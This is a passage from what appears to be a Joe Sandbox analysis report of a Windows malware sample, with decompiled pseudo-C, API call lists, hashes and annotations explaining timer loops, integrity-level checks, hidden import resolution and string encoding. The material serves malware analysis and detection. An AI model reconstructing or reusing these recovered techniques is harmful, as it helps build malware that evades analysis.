            						L9:
            						_t99 = LoadLibraryA(_v60); // executed
            						_t138 = _t99;
            						if(_t138 != 0) {
            							L13:
            							if(InterlockedExchange(_v28, _t138) == _t138) {
            								FreeLibrary(_t138);
            							} else {
            								if(_t139[6] != 0) {
            									_t102 = LocalAlloc(0x40, 8);
            									if(_t102 != 0) {
            										 *(_t102 + 4) = _t139;
            										_t125 =  *0x7ea1b8; // 0x0
            										 *_t102 = _t125;
            										 *0x7ea1b8 = _t102;
            									}
            								}
            							}
            							goto L18;
            						}
            						_v40 = GetLastError();
            						_t104 =  *0x7ea1bc; // 0x0
            						if(_t104 == 0) {
            							L12:
            							_a8 =  &_v72;
            							RaiseException(0xc06d007e, 0, 1,  &_a8);
            							return _v44;
            						}
            						_t138 =  *_t104(3,  &_v72);
            						if(_t138 != 0) {
            							goto L13;
            						}
            						goto L12;
            					}
            					_t138 =  *_t98(1,  &_v72);
            					if(_t138 != 0) {
            						goto L13;
            					}
            					goto L9;
            				}
            				_t116 =  *_t82(0,  &_v72);
            				if(_t116 != 0) {
            					goto L33;
            				}
            				goto L6;
            			}

            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007E803E
            • LoadLibraryA.KERNELBASE(?), ref: 007E80BB
            • GetLastError.KERNEL32 ref: 007E80C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 007E80FA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $
            • API String ID: 948315288-3993045852
            • Opcode ID: 10481ad35296d4ec2f4003b0c44eaee7ae66dfbc354e79cc74b2db86d5bb1da3
            • Instruction ID: a7877ce0f48c53fe65454dda851c188099f9fee604ecdb233020e04f7047476d
            • Opcode Fuzzy Hash: 10481ad35296d4ec2f4003b0c44eaee7ae66dfbc354e79cc74b2db86d5bb1da3
            • Instruction Fuzzy Hash: F6813E71A02649AFDB50CF99D880B9EB7F5FB4C310F14802DE909DB250EB78E905CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 83%
            			E007E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				void _v48;
            				long _v52;
            				struct %anon52 _v60;
            				char _v72;
            				long _v76;
            				void* _v80;
            				union _LARGE_INTEGER _v84;
            				struct %anon52 _v92;
            				void* _v96;
            				void* _v100;
            				union _LARGE_INTEGER _v104;
            				long _v108;
            				struct %anon52 _v124;
            				long _v128;
            				struct %anon52 _t46;
            				void* _t51;
            				long _t53;
            				void* _t54;
            				struct %anon52 _t61;
            				long _t65;
            				struct %anon52 _t66;
            				void* _t69;
            				void* _t73;
            				signed int _t74;
            				void* _t76;
            				void* _t78;
            				void** _t82;
            				signed int _t86;
            				void* _t89;
            
            				_t76 = __edx;
            				_v52 = 0;
            				memset( &_v48, 0, 0x2c);
            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
            				_t46 = CreateWaitableTimerA(0, 1, 0);
            				_v60 = _t46;
            				if(_t46 == 0) {
            					_v92.HighPart = GetLastError();
            				} else {
            					_push(0xffffffff);
            					_push(0xff676980);
            					_push(0);
            					_push( *0x7ea2e0);
            					_v76 = 0;
            					_v80 = 0;
            					L007E82DA();
            					_v84.LowPart = _t46;
            					_v80 = _t76;
            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
            					_t51 =  *0x7ea30c; // 0x248
            					_v76 = _t51;
            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
            					_v108 = _t53;
            					if(_t53 == 0) {
            						if(_a8 != 0) {
            							L4:
            							 *0x7ea2ec = 5;
            						} else {
            							_t69 = E007E5251(_t76); // executed
            							if(_t69 != 0) {
            								goto L4;
            							}
            						}
            						_v104.LowPart = 0;
            						L6:
            						L6:
            						if(_v104.LowPart == 1 && ( *0x7ea300 & 0x00000001) == 0) {
            							_v104.LowPart = 2;
            						}
            						_t74 = _v104.LowPart;
            						_t58 = _t74 << 4;
            						_t78 = _t89 + (_t74 << 4) + 0x38;
            						_t75 = _t74 + 1;
            						_v92.LowPart = _t74 + 1;
            						_t61 = E007E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
            						_v124 = _t61;
            						if(_t61 != 0) {
            							goto L17;
            						}
            						_t66 = _v92;
            						_v104.LowPart = _t66;
            						if(_t66 != 3) {
            							goto L6;
            						} else {
            							_v124.HighPart = E007E69E6(_t75,  &_v72, _a4, _a8);
            						}
            						goto L12;
            						L17:
            						__eflags = _t61 - 0x10d2;
            						if(_t61 != 0x10d2) {
            							_push(0xffffffff);
            							_push(0xff676980);
            							_push(0);
            							_push( *0x7ea2e4);
            							goto L21;
            						} else {
            							__eflags =  *0x7ea2e8; // 0x0
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								_t61 = E007E63F6();
            								_push(0xffffffff);
            								_push(0xdc3cba00);
            								_push(0);
            								_push( *0x7ea2e8);
            								L21:
            								L007E82DA();
            								_v104.LowPart = _t61;
            								_v100 = _t78;
            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
            								_v128 = _t65;
            								__eflags = _t65;
            								if(_t65 == 0) {
            									goto L6;
            								} else {
            									goto L12;
            								}
            							}
            						}
            						L25:
            					}
            					L12:
            					_t82 =  &_v72;
            					_t73 = 3;
            					do {
            						_t54 =  *_t82;
            						if(_t54 != 0) {
            							HeapFree( *0x7ea2d8, 0, _t54);
            						}
            						_t82 =  &(_t82[4]);
            						_t73 = _t73 - 1;
            					} while (_t73 != 0);
            					CloseHandle(_v80);
            				}
            				return _v92.HighPart;
            				goto L25;
            			}

            APIs
            • memset.NTDLL ref: 007E682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 007E683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 007E6863
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 007E6883
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,007E26E9,?), ref: 007E689E
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,007E26E9,?,00000000), ref: 007E6945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,007E26E9,?,00000000,?,?), ref: 007E6955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 007E698F
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 007E69A9
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007E69B5
              • Part of subcall function 007E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02F19218,00000000,?,74D0F710,00000000,74D0F730), ref: 007E52A0
              • Part of subcall function 007E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02F19160,?,00000000,30314549,00000014,004F0053,02F19270), ref: 007E533D
              • Part of subcall function 007E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007E68B6), ref: 007E534F
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,007E26E9,?,00000000,?,?), ref: 007E69C8
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
            • String ID:
            • API String ID: 3521023985-0
            • Opcode ID: 16c010d60060a6c97d4cf7a2254a4e57d2b6afc1a6e634aed3bfea77f3d8f384
            • Instruction ID: 02fd5f235c673c167452211d1d47ca9bcf30492f19082b7e2c0582086e21caef
            • Opcode Fuzzy Hash: 16c010d60060a6c97d4cf7a2254a4e57d2b6afc1a6e634aed3bfea77f3d8f384
            • Instruction Fuzzy Hash: E3517D7140A390BFC7119F128C8499BBBECFB9C360F508A1EF5A5D61A1D7389544CF96
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E007E415A(intOrPtr __edx, void** _a4, void** _a8) {
            				intOrPtr _v8;
            				struct _FILETIME* _v12;
            				short _v56;
            				struct _FILETIME* _t12;
            				intOrPtr _t13;
            				void* _t17;
            				void* _t21;
            				intOrPtr _t27;
            				long _t28;
            				void* _t30;
            
            				_t27 = __edx;
            				_t12 =  &_v12;
            				GetSystemTimeAsFileTime(_t12);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v8);
            				_push(_v12);
            				L007E82D4();
            				_push(_t12);
            				_v12 = _t12;
            				_t13 =  *0x7ea348; // 0x272d5a8
            				_t5 = _t13 + 0x7eb7b4; // 0x2f18d5c
            				_t6 = _t13 + 0x7eb644; // 0x530025
            				_push(0x16);
            				_push( &_v56);
            				_v8 = _t27;
            				L007E7F3A();
            				_t17 = CreateFileMappingW(0xffffffff, 0x7ea34c, 4, 0, 0x1000,  &_v56); // executed
            				_t30 = _t17;
            				if(_t30 == 0) {
            					_t28 = GetLastError();
            				} else {
            					if(GetLastError() == 0xb7) {
            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
            						if(_t21 == 0) {
            							_t28 = GetLastError();
            							if(_t28 != 0) {
            								goto L6;
            							}
            						} else {
            							 *_a4 = _t30;
            							 *_a8 = _t21;
            							_t28 = 0;
            						}
            					} else {
            						_t28 = 2;
            						L6:
            						CloseHandle(_t30);
            					}
            				}
            				return _t28;
            			}

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53,?,?), ref: 007E4166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 007E417C
            • _snwprintf.NTDLL ref: 007E41A1
            • CreateFileMappingW.KERNELBASE(000000FF,007EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 007E41BD
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53,?), ref: 007E41CF
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 007E41E6
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53), ref: 007E4207
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53,?), ref: 007E420F
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
            • String ID:
            • API String ID: 1814172918-0
            • Opcode ID: ec42225e66449355faeccb8fdd9df1ee8bdab1e60a406d4a781e6e062db29d05
            • Instruction ID: 794caa95d6d2ec42a60d06ce9d3fc556581f30fc7e5dc5aec1299d698b5f129c
            • Opcode Fuzzy Hash: ec42225e66449355faeccb8fdd9df1ee8bdab1e60a406d4a781e6e062db29d05
            • Instruction Fuzzy Hash: FE21A572642284BBCB21DB69CC45F9E37B9BB8C750F214121F705EB2D0D7789905CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 93%
            			E007E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
            				void* _t17;
            				void* _t18;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            				intOrPtr _t24;
            				void* _t37;
            				void* _t41;
            				intOrPtr* _t45;
            
            				_t41 = __edi;
            				_t37 = __ebx;
            				_t45 = __eax;
            				_t16 =  *((intOrPtr*)(__eax + 0x20));
            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
            					E007E16B2(_t16, __ecx, 0xea60);
            				}
            				_t17 =  *(_t45 + 0x18);
            				_push(_t37);
            				_push(_t41);
            				if(_t17 != 0) {
            					InternetSetStatusCallback(_t17, 0);
            					InternetCloseHandle( *(_t45 + 0x18)); // executed
            				}
            				_t18 =  *(_t45 + 0x14);
            				if(_t18 != 0) {
            					InternetSetStatusCallback(_t18, 0);
            					InternetCloseHandle( *(_t45 + 0x14));
            				}
            				_t19 =  *(_t45 + 0x10);
            				if(_t19 != 0) {
            					InternetSetStatusCallback(_t19, 0);
            					InternetCloseHandle( *(_t45 + 0x10));
            				}
            				_t20 =  *(_t45 + 0x1c);
            				if(_t20 != 0) {
            					CloseHandle(_t20);
            				}
            				_t21 =  *(_t45 + 0x20);
            				if(_t21 != 0) {
            					CloseHandle(_t21);
            				}
            				_t22 =  *((intOrPtr*)(_t45 + 8));
            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
            					E007E61DA(_t22);
            					 *((intOrPtr*)(_t45 + 8)) = 0;
            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
            				}
            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
            					E007E61DA(_t23);
            				}
            				_t24 =  *_t45;
            				if(_t24 != 0) {
            					_t24 = E007E61DA(_t24);
            				}
            				_t46 =  *((intOrPtr*)(_t45 + 4));
            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
            					return E007E61DA(_t46);
            				}
            				return _t24;
            			}

            APIs
            • InternetSetStatusCallback.WININET(?,00000000), ref: 007E4C15
            • InternetCloseHandle.WININET(?), ref: 007E4C1A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 007E4C25
            • InternetCloseHandle.WININET(?), ref: 007E4C2A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 007E4C35
            • InternetCloseHandle.WININET(?), ref: 007E4C3A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,007E2248,?,?,74CF81D0,00000000,00000000), ref: 007E4C4A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,007E2248,?,?,74CF81D0,00000000,00000000), ref: 007E4C54
              • Part of subcall function 007E16B2: WaitForMultipleObjects.KERNEL32(00000002,007E7C47,00000000,007E7C47,?,?,?,007E7C47,0000EA60), ref: 007E16CD
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
            • String ID:
            • API String ID: 2824497044-0
            • Opcode ID: eda3c4ce25e52cc7ffd0f84068576b62fc134a156dce673ca342f96d0e31231d
            • Instruction ID: d079176e3fb1fc406f9c5fdcbbbe2d2bb2a1734f255a620b6eb517fbd10829c6
            • Opcode Fuzzy Hash: eda3c4ce25e52cc7ffd0f84068576b62fc134a156dce673ca342f96d0e31231d
            • Instruction Fuzzy Hash: 1F113D7660269CABC530AFABDD84C1BB7FDAB4C3013654D18F185D3521C738FC458A64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0078024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction ID: 11e41495bae7d7e4d724454cbfe7a509fbcdab37b2827ee2bc84ff87f4a961b5
            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction Fuzzy Hash: 19527974A01229DFDBA4CF58C984BA8BBB1BF09304F1480D9E50DAB351DB34AE99DF54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E007E5E40(long* _a4) {
            				long _v8;
            				void* _v12;
            				void _v16;
            				long _v20;
            				int _t33;
            				void* _t46;
            
            				_v16 = 1;
            				_v20 = 0x2000;
            				if( *0x7ea2fc > 5) {
            					_v16 = 0;
            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
            						_v8 = 0;
            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
            						if(_v8 != 0) {
            							_t46 = E007E33DC(_v8);
            							if(_t46 != 0) {
            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
            								if(_t33 != 0) {
            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
            								}
            								E007E61DA(_t46);
            							}
            						}
            						CloseHandle(_v12);
            					}
            				}
            				 *_a4 = _v20;
            				return _v16;
            			}

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 007E5E72
            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 007E5E92
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007E5EA2
            • CloseHandle.KERNEL32(00000000), ref: 007E5EF2
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 007E5EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 007E5ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 007E5EDD
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: ee5987b68d3d04720cd5dab269e65ba6a6e49e0776d092e398c6c68c3a75049d
            • Instruction ID: 4f9b90d996f55b102b142aa8ee5b37d399393a232da2e5c307143115469d5ff9
            • Opcode Fuzzy Hash: ee5987b68d3d04720cd5dab269e65ba6a6e49e0776d092e398c6c68c3a75049d
            • Instruction Fuzzy Hash: 0721597590128DFFEB00DF91CC84EEEBBB9EB48304F0040A5EA10AA161DB799B54DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 64%
            			E007E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				// Builds one "name=value"-style item: a formatted prefix (the format string
            				// starts "%s=%", the DWORD 0x253d7325 read as little-endian ASCII) is joined
            				// with the caller's _a4, the result is transformed and "=" is trimmed off.
            				// The comments are the editor's annotations, not part of the Joe Sandbox listing.
            				intOrPtr _v8;
            				intOrPtr _t9;
            				intOrPtr _t13;
            				char* _t19;
            				char* _t28;
            				void* _t33;
            				void* _t34;
            				char* _t36;
            				void* _t38;
            				intOrPtr* _t39;
            				char* _t40;
            				char* _t42;
            				char* _t43;
            
            				_t34 = __edx;
            				_push(__ecx);
            				_t9 =  *0x7ea348; // 0x272d5a8   (value added to every string-table offset)
            				_t1 = _t9 + 0x7eb516; // 0x253d7325 == "%s=%": start of the format string
            				_t36 = 0;
            				_t28 = E007E5815(__ecx, _t1);          // sprintf-style formatting of the prefix (see APIs)
            				if(_t28 != 0) {
            					_t39 = __imp__;                     // lstrlen, called through the import table
            					_t13 =  *_t39(_t28, _t38);
            					_v8 = _t13;
            					_t6 =  *_t39(_a4) + 1; // 0x2f19601
            					_t40 = E007E33DC(_v8 + _t6);        // RtlAllocateHeap(len(prefix) + len(_a4) + 1)
            					if(_t40 != 0) {
            						strcpy(_t40, _t28);
            						_pop(_t33);
            						__imp__(_t40, _a4);             // lstrcat(_t40, _a4)
            						_t19 = E007E5063(_t33, _t34, _t40, _a8); // executed   -- transforms the joined string; its output is trimmed of "=" below, consistent with a base64-style encoding
            						_t36 = _t19;
            						E007E61DA(_t40);                // RtlFreeHeap(_t40)
            						// StrTrimA removes "=" from both ends of the string, i.e. strips padding
            						_t42 = E007E4AC7(StrTrimA(_t36, "="), _t36);   // _snprintf-based rewrite (see APIs)
            						if(_t42 != 0) {
            							E007E61DA(_t36);
            							_t36 = _t42;
            						}
            						_t43 = E007E2708(_t36, _t33);
            						if(_t43 != 0) {
            							E007E61DA(_t36);
            							_t36 = _t43;
            						}
            					}
            					E007E61DA(_t28);
            				}
            				return _t36;                            // heap string owned by the caller, 0 on failure
            			}

            Instruction addresses for the decompiled lines above, in listing order: 0x007e6675, 0x007e6678, 0x007e6679, 0x007e6680, 0x007e6687, 0x007e668e, 0x007e6692, 0x007e6699, 0x007e66a0, 0x007e66a5, 0x007e66ad, 0x007e66b7, 0x007e66bb, 0x007e66bf, 0x007e66c5, 0x007e66ca, 0x007e66d4, 0x007e66da, 0x007e66dc, 0x007e66f3, 0x007e66f7, 0x007e66fa, 0x007e66ff, 0x007e66ff, 0x007e6708, 0x007e670c, 0x007e670f, 0x007e6714, 0x007e6714, 0x007e670c, 0x007e6717, 0x007e671c, 0x007e6722

            APIs
              • Part of subcall function 007E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007E668E,253D7325,00000000,00000000,?,7491C740,007E3ECE), ref: 007E587C
              • Part of subcall function 007E5815: sprintf.NTDLL ref: 007E589D
            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A0
            • lstrlen.KERNEL32(00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A8
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • strcpy.NTDLL ref: 007E66BF
            • lstrcat.KERNEL32(00000000,00000000), ref: 007E66CA
              • Part of subcall function 007E5063: lstrlen.KERNEL32(00000000,00000000,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E5074
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66E7
              • Part of subcall function 007E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,007E66F3,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E4AD1
              • Part of subcall function 007E4AC7: _snprintf.NTDLL ref: 007E4B2F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
            • String ID: =
            • API String ID: 2864389247-1428090586
            • Opcode ID: 28bcd27b4461981bc119159c6fcaaf1639d9f0bc123ad01b76f6c6ba3b56ede4
            • Instruction ID: dc5ce1c9939681cd9c6d1689ae0d002b27416b05f9fc229f6184e472e4bb09b7
            • Opcode Fuzzy Hash: 28bcd27b4461981bc119159c6fcaaf1639d9f0bc123ad01b76f6c6ba3b56ede4
            • Instruction Fuzzy Hash: 1411CA739035A9B78612BB769CC9C6F37AD9E5D7A83054016FA04AB203DE7CDD0247E1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph of E00401202, rebuilt from the graph data as a block list (block id: address range, notable calls → successor blocks):
            • 425: 401202-401214, call 4012e6 → 428, 429
            • 428: 4012d5 → 432
            • 429: 40121a-40124f, GetModuleHandleA, GetProcAddress → 430, 431
            • 430: 401251-401265, GetProcAddress → 431, 433
            • 431: 4012cd-4012d3, call 401ba9 → 432
            • 432: 4012dc-4012e3
            • 433: 401267-40127b, GetProcAddress → 431, 435
            • 435: 40127d-401291, GetProcAddress → 431, 437
            • 437: 401293-4012a7, GetProcAddress → 431, 438
            • 438: 4012a9-4012ba, call 40110b → 440
            • 440: 4012bf-4012c4 → 431, 441
            • 441: 4012c6-4012cb → 432
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				// Allocates a 0x20-byte context, resolves five functions from one module with
            				// GetProcAddress and hands the context to E0040110B, which creates a section
            				// (NtCreateSection, see APIs). Neither the module nor the function names are
            				// literals: each is *0x404184 + offset, a lookup relative to a runtime base that
            				// keeps the import names out of the static string table. Return values are
            				// Win32 error codes. The comments are the editor's annotations, not part of the listing.
            				intOrPtr _v8;
            				_Unknown_base(*)()* _t29;
            				_Unknown_base(*)()* _t33;
            				_Unknown_base(*)()* _t36;
            				_Unknown_base(*)()* _t39;
            				_Unknown_base(*)()* _t42;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t50;
            				intOrPtr _t56;
            
            				_t56 = E004012E6(0x20);                  // RtlAllocateHeap(0x20), see APIs
            				if(_t56 == 0) {
            					_v8 = 8;                             // ERROR_NOT_ENOUGH_MEMORY
            				} else {
            					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
            					_v8 = 0x7f;                          // ERROR_PROC_NOT_FOUND, returned if any lookup below fails
            					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
            					 *(_t56 + 0xc) = _t29;                // context+0x0c .. +0x1c receive the five function pointers
            					if(_t29 == 0) {
            						L8:
            						E00401BA9(_t56);                 // release the context on any failure
            					} else {
            						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
            						 *(_t56 + 0x10) = _t33;
            						if(_t33 == 0) {
            							goto L8;
            						} else {
            							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
            							 *(_t56 + 0x14) = _t36;
            							if(_t36 == 0) {
            								goto L8;
            							} else {
            								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
            								 *(_t56 + 0x18) = _t39;
            								if(_t39 == 0) {
            									goto L8;
            								} else {
            									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
            									 *(_t56 + 0x1c) = _t42;
            									if(_t42 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t56 + 8)) = _a8;
            										 *((intOrPtr*)(_t56 + 4)) = _a4;
            										_t46 = E0040110B(_t56, _a12); // executed   -- NtCreateSection(SECTION_ALL_ACCESS, SEC_COMMIT) plus memset, see APIs
            										_v8 = _t46;
            										if(_t46 != 0) {
            											goto L8;
            										} else {
